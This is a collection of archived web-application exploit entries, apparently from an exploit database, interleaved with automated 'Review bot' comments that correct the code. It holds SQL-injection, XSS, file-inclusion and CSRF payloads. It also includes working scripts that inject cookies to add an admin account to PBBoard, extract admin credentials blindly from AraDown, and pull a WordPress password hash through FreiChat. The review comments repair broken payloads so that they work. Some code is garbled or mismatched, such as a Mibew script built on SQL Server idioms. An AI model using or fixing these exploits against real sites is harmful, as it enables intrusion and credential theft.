register_files_for_cleanup("c:\\#{@down_file}.exe")
end
end
end
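Review bot: In communicate, `command_length` is computed over two lines (`'%02x' % command.length` then the hex-to-chr scan) and never used — the frame is built from `[command.length].pack('n')` — so those two lines are dead and should be deleted. The header / 2-byte length / body read sequence is repeated roughly fifteen times across check and communicate with only the expected header bytes changing, which makes the protocol handling hard to audit and leaves the two methods with subtly different error behaviour (check returns Unknown, communicate calls fail_with); pulling it into one helper and having each caller decide what to do with a nil result would cut the module by a few hundred lines. Note the helper below returns an empty string for a zero-length body, so the call sites that currently require `data_length == 0` would test for `''` rather than nil.
```ruby
  # Read one arkeiad frame: a 6-byte header whose first four bytes must equal
  # +expected+, a 2-byte big-endian body length, then the body.
  # Returns the body ('' when the length is zero) or nil on any mismatch or short read.
  def read_frame(expected)
    header = sock.get_once(6)
    return nil unless header && header.length == 6 && header[0, 4] == expected
    len = sock.get_once(2)
    return nil unless len && len.length == 2
    len = len.unpack('n')[0]
    return '' if len.zero?
    body = sock.get_once(len)
    body && body.length == len ? body : nil
  end
  # … unchanged: check/communicate, with each header+length+body block replaced by one read_frame call …
```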

10
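--- /dev/null
+++ b/platforms/php/webapps/37575.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54814/info
+The 'com_photo' module for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+http://www.example.com.np/index.php?option=com_photo&task=gallery&AlbumId=8[SQL Injection]
+http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection]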


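--- /dev/null
+++ b/platforms/php/webapps/37578.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54822/info
+Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
+http://www.example.com/openconstructor/users/users.php?type=multiple&keyword=<script>alert('xss')</script>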


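--- /dev/null
+++ b/platforms/php/webapps/37579.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54822/info
+Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
+http://www.example.com/openconstructor/data/file/edit.php?result=<script>aler('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save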
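Review bot: The PoC URL calls `aler('xss')` instead of `alert('xss')`, so as written the injected script throws a ReferenceError rather than demonstrating the reflection, and anyone pasting it will see no dialog and may wrongly conclude the `result` parameter is not vulnerable. The line should read `edit.php?result=<script>alert('xss')</script>&id=new&...` with the remaining parameters unchanged. Only the payload text is wrong; nothing here suggests the injection point itself is mis-identified.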


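--- /dev/null
+++ b/platforms/php/webapps/37580.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54822/info
+Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
+http://www.example.com/openconstructor/confirm.php?q=<script>alert('XSS')</script>skin=metallic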
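Review bot: The PoC URL runs `</script>skin=metallic` together with no `&` separator, so `skin=metallic` is sent as part of the `q` value rather than as a second parameter. If `skin` is meant to be its own parameter — which the entry's title "q Parameter XSS" suggests — the line should read `confirm.php?q=<script>alert('XSS')</script>&skin=metallic`. This may be an artifact of how the advisory was extracted rather than an error in the original, so it is worth confirming against the SecurityFocus source before changing it.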


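--- /dev/null
+++ b/platforms/php/webapps/37581.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54845/info
+Dir2web is prone to multiple security vulnerabilities, including an SQL-Injection vulnerability and an information-disclosure vulnerability.
+Successfully exploiting these issues allows remote attackers to compromise the software, retrieve information, modify data, disclose sensitive information, or gain unauthorized access; other attacks are also possible.
+Dir2web versions 3.0 is vulnerable; other versions may also be affected.
+http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa&apos; OR id > 0-- -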
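Review bot: The PoC contains `&apos;` where a literal single quote is meant — an HTML entity left over from rendering — so the string as written sends `oid=6a303a0aaa&apos; OR id > 0-- -`, which never closes the SQL quote and will not demonstrate the injection. It should read `index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- -`. The advisory also announces an information-disclosure issue alongside the SQL injection but gives no request for it, so readers have nothing to reproduce for that second finding.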

117
platforms/php/webapps/37582.py Executable file

@ -0,0 +1,117 @@
source: http://www.securityfocus.com/bid/54857/info
Mibew Messenger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Mibew Messenger 1.6.4 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#Author: Ucha Gobejishvili
#Timeline: 2012-08-05 Bug Discovered
# 2012-08-05 Public Disclosured
#Vendor: Mibew Web Messenger (http://mibew.org/ )
#Version: Mibew Messenger 1.6.4
#Demo: http://demo.mibew.org
#Introduction:
#Mibew Messenger (also known as Open Web Messenger) is an open-#source live
support application written in PHP and MySQL. It #enables one-on-one chat
assistance in real-time directly from #your website.
#Abstract:
#Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4.
A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4
The vulnerabilities allows an remote attacker #to execute own sql commands
on the affected applicationdbms. #Successful exploitation can result in
dbms, web-server or #application compromise.
# python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/
import sys, httplib, urllib2, urllib, re
from optparse import OptionParser
usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d
/coldcal/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
help="Directory path to the CMS")
(options, args) = parser.parse_args()
def banner():
print "\n\t|
----------------------------------------------------------- |"
print "\t| Mibew Web Messenger SQL Injection Vulnerability|"
print "\t| |\n"
if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)
def getProxy():
try:
pr = httplib.HTTPConnection(options.proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
return proxy_handler
def setTargetHTTP():
if options.target[0:7] != 'http://':
options.target = "http://" + options.target
return options.target
def getRequest(exploit):
if options.proxy:
try:
proxyfier = urllib2.build_opener(getProxy())
check = proxyfier.open(options.target+options.directory+exploit).read()
except urllib2.HTTPError, error:
check = error.read()
except socket.error:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
req = urllib2.Request(options.target+options.directory+exploit)
check = urllib2.urlopen(req).read()
except urllib2.HTTPError, error:
check = error.read()
except urllib2.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check
basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
':'host_name()','version: \n\n\t':'@@version'}
def basicSploit(info):
return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info
+ ")--"
if __name__ == "__main__":
banner()
options.target = setTargetHTTP()
print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
print "\n(+) Testing Proxy..."
print "(+) Proxy @ %s" % (options.proxy)
print "(+) Building Handler.."
for key in basicInfo:
getResp = getRequest(basicSploit(basicInfo[key]))
if re.findall("the nvarchar value '", getResp):
dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
int')[0]
print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())
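Review bot: `socket` is used in the handlers `except(socket.timeout):` and `except socket.error:` but never imported (the import line is `import sys, httplib, urllib2, urllib, re`), so any failure inside those `try` blocks surfaces as a `NameError` rather than the intended message; `import sys, socket, httplib, urllib2, urllib, re` is the one-line fix. The detection string `the nvarchar value '` and the `convert(int,` construct in `basicSploit` are Microsoft SQL Server error idioms, while the header describes Mibew as a PHP/MySQL application, so as written the script cannot confirm anything against the product it names — it reads as a template reused from another tool, which the `/coldcal/` example path in the usage string also suggests. The quoting in `getResp.split('the nvarchar value '')[1].split('' to data type int')[0]` appears mangled (adjacent literals concatenate into a single string), so even a matching response would not be parsed as intended. The indentation of every `def` and `if` body has been lost in this rendering, which makes the file unrunnable in this form; worth confirming the archived original still carries it.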


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/54859/info
YT-Videos Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ytvideos/play.php?id=2'

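--- a/platforms/php/webapps/37584.txt
+++ b/platforms/php/webapps/37584.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54861/info
+TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+Versions prior to TCExam 11.3.008 are vulnerable.
+http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id
+http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id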


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54861/info
TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Versions prior to TCExam 11.3.008 are vulnerable.
http://www.example.com/admin/code/tce_edit_question.php?subject_module_id

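--- a/platforms/php/webapps/37586.php
+++ b/platforms/php/webapps/37586.php
@@ -0,0 +1,99 @@
+source: http://www.securityfocus.com/bid/54862/info
+PBBoard is a web-based messaging board application implemented in PHP.
+Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.
+PBBoard versions prior to 2.1.4 are vulnerable.
+http://drupal.org/node/207891
+<?
+/*
++ Application : Power Bulletin Board < 2.1.4
+| Download : pbboard.com
+| By Faris , AKA i-Hmx
+| n0p1337@gmail.com
++ sec4ever.com , 1337s.cc
+Time line :
+> 14/7/2012 , Vulnerability discovered
+> 30/7/2012 , Vendor Reported
+> 31/7/2012 , patch released
+> 01/8/2012 , Public disclosure
+engine/engine.class.php
+$this->_CONF['admin_username_cookie'] = 'PowerBB_admin_username';
+$this->_CONF['admin_password_cookie'] = 'PowerBB_admin_password';
+admin/common.module.php
+if (!empty($username)
+and !empty($password))
+{
+$CheckArr = array();
+$CheckArr['username'] = $username;
+$CheckArr['password'] = $password;
+$CheckMember = $PowerBB->member->CheckAdmin($CheckArr);
+if ($CheckMember != false)
+{
+$PowerBB->_CONF['rows']['member_row'] = $CheckMember;
+$PowerBB->_CONF['member_permission'] = true;
+}
+else
+{
+$PowerBB->_CONF['member_permission'] = false;
+}
+}
+Function CheckAdmin is called from
+engine/systyms/member.class.php
+go deeper and deeper till u find the vulnerable query
+this can be used to bypass login rules as cookies are not sanitized before being called for login confirmation
+*/
+echo "\n+-------------------------------------------+\n";
+echo "| PBulletin Board < 2.1.4 |\n";
+echo "| Auth Bypass vuln / Admin add Exploit |\n";
+echo "| By i-Hmx |\n";
+echo "| n0p1337@gmail.com |\n";
+echo "+-------------------------------------------+\n";
+echo "\n| Enter Target # ";
+function get($url,$post,$cookies){
+$curl=curl_init();
+curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($curl,CURLOPT_URL,"http://".$url);
+curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
+curl_setopt($curl,CURLOPT_COOKIE,$cookies);
+//curl_setopt($curl, CURLOPT_REFERER, $reffer);
+curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($curl,CURLOPT_TIMEOUT,20);
+curl_setopt($curl, CURLOPT_HEADER, true);
+$exec=curl_exec($curl);
+curl_close($curl);
+return $exec;
+}
+function kastr($string, $start, $end){
+$string = " ".$string;
+$ini = strpos($string,$start);
+if ($ini == 0) return "";
+$ini += strlen($start);
+$len = strpos($string,$end,$ini) - $ini;
+return substr($string,$ini,$len);
+}
+$vic=str_replace('http://','',trim(fgets(STDIN)));
+if($vic==''){exit();}
+$log=fopen('faris.txt','w+');
+$ran=rand(10000,20000);
+echo "| Adding New User\n";
+$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
+$myid=kastr($add,'main=1&id=','">');
+if($myid==''){exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit");}
+echo "| User Data :\n + UserName : f4ris_$ran\n + Password : sec4ever1337s\n + User ID : $myid\n";
+echo "| Updating User privileges\n";
+$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
+echo "+ Exploitatin Done ;)\n";
+exit();
+?>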
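Review bot: The second request, `$update=get($vic."admin.php?page=member&edit=1…`, omits the `/` that the first request inserts (`$vic.'/admin.php?…'`), so the path is concatenated directly onto the host and the result of `$update` is never inspected — the script prints `Exploitatin Done` whether or not that request did anything. `$log=fopen('faris.txt','w+')` opens a handle that is never written to or closed, so it only leaves an empty file next to the script. `kastr` relies on the loose comparison `$ini == 0` to treat `strpos`'s `false` as "not found", which only works because of the leading space prepended on the line before; `=== false` would state that intent and not depend on the prefix.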


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54866/info
GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
GetSimple 3.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/cms/admin/filebrowser.php?path=[LFI]

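--- a/platforms/php/webapps/37588.txt
+++ b/platforms/php/webapps/37588.txt
@@ -0,0 +1,194 @@
+# Exploit Title: CSRF, Unrestricted File Upload, Privilege escalation & XSS
+# Google Dork: intitle: CSRF, Unrestricted File Upload, Privilege
+escalation & XSS
+# Date: 2015-07-12
+# Exploit Author: John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: phpsqlitecms.net
+# Software Link: phpsqlitecms.net/download
+# Version: ilosuna-phpsqlitecms-d9b8219
+# Tested on: windows 7 SP1
+# Category: Web apps CMS
+Vendor:
+================================
+phpsqlitecms.net
+Product:
+================================
+ilosuna-phpsqlitecms-d9b8219
+Advisory Information:
+==============================================================================
+CSRF, Unrestricted File type upload, Privilege escalation & XSS
+Vulnerabilities.
+User will be affected if they visit a malicious website or click any
+infected link.
+Possibly resulting in malicious attackers taking control of the Admin / CMS
+area.
+Vulnerability Details:
+=====================
+CSRF:
+-----
+We can add arbitrary users to the system, delete arbitrary web server files
+and escalate privileges, as no CSRF token is present.
+Add arbitrary user:
+-------------------
+The following request variables are all that is needed to add users to
+system.
+mode = users
+new_user_submitted = true
+name = "hyp3rlinx"
+pw = "12345"
+pw_r = "12345"
+Privilege escalation:
+---------------------
+Under users area in admin we can easily gain admin privileges, again using
+CSRF vulnerability we
+submit form using our id and change request variable to type '1' granting
+us admin privileges.
+e.g.
+mode:users
+edit_user_submitted:true
+id:3
+name:hyp3rlinx
+new_pw:
+new_pw_r:
+type:1 <------make us admin
+Delete arbitrary files:
+------------------------
+The following request parameters are all we is need to delete files from
+media or files directorys
+under the web servers CMS area.
+mode=filemanager
+directory=files
+delete=index.html
+confirmed=true
+XSS:
+-----
+We can steal PHP session cookie via XSS vulnerability
+Unrestricted File Type Upload:
+------------------------------
+The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts
+when selected will execute
+whatever PHP script we upload.
+Exploit code(s):
+===============
+1- CSRF POC Add arbitrary users to the system.
+---------------------------------------------
+<script>
+function doit(){
+var e=document.getElementById('evil')
+e.submit()
+}
+</script>
+</head>
+<body onLoad="doit()">
+<form id="evil" action="
+http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"
+method="post">
+<input type="text" name="mode" value="users"/>
+<input type="text" name="new_user_submitted" value="true"/>
+<input type="text" name="name" value="hyp3rlinx" />
+<input type="text" name="pw" value="abc123" />
+<input type="text" name="pw_r" value="abc123" />
+</form>
+2- CSRF privilege escalation POST URL:
+--------------------------------------
+http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php
+Privilege escalation request string:
+------------------------------------
+mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1
+3- CSRF Delete Aribitary Server Files:
+--------------------------------------
+Below request URL will delete the index.html file in files dir on web
+server without any type
+of request validation CSRF token etc.
+http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
+&directory=files&delete=index.html&confirmed=true
+XSS steal PHP session ID POC:
+-----------------------------
+http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&
+edit=49&comment_id="/><script>alert('XSS by hyp3rlinx
+'%2bdocument.cookie)</script>&page=1
+Disclosure Timeline:
+=========================================================
+Vendor Notification: NA
+July 12, 2015 : Public Disclosure
+Severity Level:
+=========================================================
+High
+Description:
+==========================================================
+Request Method(s): [+] POST & GET
+Vulnerable Product: [+] ilosuna-phpsqlitecms-d9b8219
+Vulnerable Parameter(s): [+] comment_id, delete, type,
+new_user_submitted
+Affected Area(s): [+] Admin & CMS
+===========================================================
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+(hyp3rlinx)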


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54887/info
PHPList is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PHPList 2.10.18 is vulnerable; other versions may also be affected.
http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

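--- a/platforms/php/webapps/37591.php
+++ b/platforms/php/webapps/37591.php
@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/54891/info
+AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+<?php
+echo "
+_____ _ _ _____ _____ _______
+/ ___| | | | | / _ \ / ___/|__ __|
+| | _ | |__| | | | | | | |___ | |
+| | | | | __ | | | | | \___ \ | |
+| |_| | | | | | | |_| | ___| | | |
+\_____/ |_| |_| \_____/ /_____/ |_|
+____ _ _____ _____ _____ ___ ___
+| _ \ | | / _ \ / _ \ | _ \ \ \ / /
+| |_) | | | | | | | | | | | | | | \ \ \/ /
+| _ ( | | | | | | | | | | | | | | \ /
+| |_) | | |___ | |_| | | |_| | | |_| / | |
+|____/ |_____| \_____/ \_____/ |_____/ |__|
+[*]-----------------------------------------------------------------------[*]
+# Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection
+# Google Dork : 'powered by AraDown'
+# Date : 08/07/2012
+# Exploit Author : G-B
+# Email : g22b@hotmail.com
+# Software Link : http://aradown.info/
+# Version : All Version
+[*]-----------------------------------------------------------------------[*]
+[*] Target -> ";
+$target = stdin();
+$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
+echo "[*] Username : ";
+for($i=1;$i<=30;$i++){
+foreach($ar as $char){
+$b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
+if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
+$i = 50;
+break;
+}
+if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
+echo $char;
+break;
+}
+}
+echo "\n[*] Password : ";
+for($i=1;$i<=32;$i++){
+foreach($ar as $char){
+$b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
+if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
+echo $char;
+break;
+}
+}
+function send($target,$query){
+$ch = curl_init();
+curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
+curl_setopt($ch,CURLOPT_POST,true);
+curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
+$r = curl_exec($ch);
+curl_close($ch);
+return $r;
+}
+function stdin(){
+$fp = fopen("php://stdin","r");
+$line = trim(fgets($fp));
+fclose($fp);
+return $line;
+}
+?>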
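Review bot: `$target = stdin();` reads a value that is never used — both `send(...)` calls pass the literal `'http://server'`, so the prompt printed by the banner is misleading and the file is a fixed demonstration rather than a working PoC. `eregi()` was deprecated in PHP 5.3 and removed in 7.0, so the script stops with a fatal error on any current interpreter; noting the PHP version it was written against in the header would save an analyst the surprise. In the username loop the early exit is expressed as `$i = 50;` followed by `break;`, which silently relies on the outer `for` bound; `break 2;` states that intent directly.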

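--- a/platforms/php/webapps/37592.php
+++ b/platforms/php/webapps/37592.php
@@ -0,0 +1,85 @@
+/*
+# Exploit Title: FreiChat 9.6 SQL Injection
+# Date: 27-11-2014
+# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+1. Description
+$_GET['time'] is not escaped.
+File: freichat\server\plugins\chatroom\chatroom.php
+$get_mesg = $this->get_messages($_GET['time']);
+public function get_messages($time) {
+$frm_id = $this->frm_id;
+$result = array();
+if ($time == 0) {
+//$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
+} else {
+$get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
+$result = $this->db->query($get_mesg_query)->fetchAll();
+}
+return $result;
+}
+http://security.szurek.pl/freichat-96-sql-injection.html
+2. Proof of Concept
+Example for WordPress integration (it will give you admin password):
+*/
+<?php
+/*
+* Kacper Szurek
+* http://security.szurek.pl
+*/
+function hack($url, $cookie, $sql ){
+$ckfile = dirname(__FILE__) . $cookie;
+$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
+curl_setopt($ch, CURLOPT_TIMEOUT, 10);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$content = curl_exec($ch);
+if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
+curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
+$content = curl_exec($ch);
+curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));
+$content = curl_exec($ch);
+if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
+echo "WordPress password user ID=1: ".$output[1];
+} else {
+echo "FAIL";
+}
+}
+curl_close( $ch );
+}
+// URL to WordPress main URL
+$url = "http://wp/";
+// SQL Payload
+$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";
+$cookie = "/cookie.txt";
+hack($url, $cookie, $sql);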
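Review bot: `$cookie = fopen($ckfile, 'w')` at the top of `hack()` overwrites the path parameter with a stream resource, and that resource is then handed to `CURLOPT_COOKIEJAR`, which expects a filename; PHP stringifies it (`Resource id #N`), so the jar is written under that name in the working directory, the file created at `$ckfile` stays empty, and the handle from `fopen` is never closed. Passing `$ckfile` to `curl_setopt($ch, CURLOPT_COOKIEJAR, $ckfile);` and dropping the `fopen` line removes both problems. The `or die(...)` guard also becomes unnecessary since curl reports its own failure to open the jar. `$url`, `$sql` and `$cookie` are fixed literals at the bottom of the file, so a comment stating that the file is a demonstration against a local test instance rather than a parameterised tool would set expectations for whoever reads it from the archive.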

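--- a/platforms/php/webapps/37594.txt
+++ b/platforms/php/webapps/37594.txt
@@ -0,0 +1,25 @@
+## In The Name Of ALLAH ##
+# title : Arabportal 3 SQL injection vulnerability
+# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
+# Google Dork: inurl:members.php?action=signup
+# Date: 2015/07/10 (july 10th)
+# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
+# Vendor Homepage: www.arabportal.net
+# Software Link: www.arabportal.net
+# Version: 3
+# Tested on: linux
+# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1
+members.php?action=singup
+POST parameter "showemail" is vulnerable to error based SQLi attack
+................................................................................
+1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady
+video : https://youtu.be/5nFblYE90Vk
+good luck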

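--- a/platforms/php/webapps/37595.txt
+++ b/platforms/php/webapps/37595.txt
@@ -0,0 +1,25 @@
+## In The Name Of ALLAH ##
+# Exploit Title: phpVibe ALL versions LFD vulnerability
+# Google Dork: "powered by phpvibe"
+# Date: 2015/07/13 (july 13th)
+# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
+# Vendor Homepage: http://www.phpvibe.com/
+# Software Link: http://get.phpvibe.com/
+# Version: All versions
+# Tested on: linux
+# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1
+stream.php
+====================================
+$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));
+file parameter has no validation and sanitization!
+exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed):
+http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
+=====================================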

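--- a/platforms/php/webapps/37596.txt
+++ b/platforms/php/webapps/37596.txt
@@ -0,0 +1,131 @@
+
+ArticleFR 3.0.6 CSRF Add Admin Exploit
+Vendor: Free Reprintables
+Product web page: http://www.freereprintables.com
+Affected version: 3.0.6
+Summary: A lightweight fully featured content (article / video)
+management system. Comes with a pluginable and multiple module
+framework system.
+Desc: The application allows users to perform certain actions
+via HTTP requests without performing any validity checks to
+verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user
+visits a malicious web site.
+Tested on: nginx/1.6.2
+PHP
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5248
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php
+21.06.2015
+--
+<html>
+<body>
+<form action="http://127.0.0.1/dashboard/users/create/" method="POST">
+<input type="hidden" name="username" value="thricer" />
+<input type="hidden" name="name" value="The_Hacker" />
+<input type="hidden" name="password" value="s3cr3t" />
+<input type="hidden" name="email" value="lab@zeroscience.mk" />
+<input type="hidden" name="website" value="http://www.zeroscience.mk" />
+<input type="hidden" name="blog" value="zsl" />
+<input type="hidden" name="membership" value="admin" />
+<input type="hidden" name="isactive" value="active" />
+<input type="hidden" name="submit" value="Create" />
+<input type="submit" value="Request" />
+</form>
+</body>
+</html>
+##################################################################
+ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities
+Vendor: Free Reprintables
+Product web page: http://www.freereprintables.com
+Affected version: 3.0.6
+Summary: A lightweight fully featured content (article / video)
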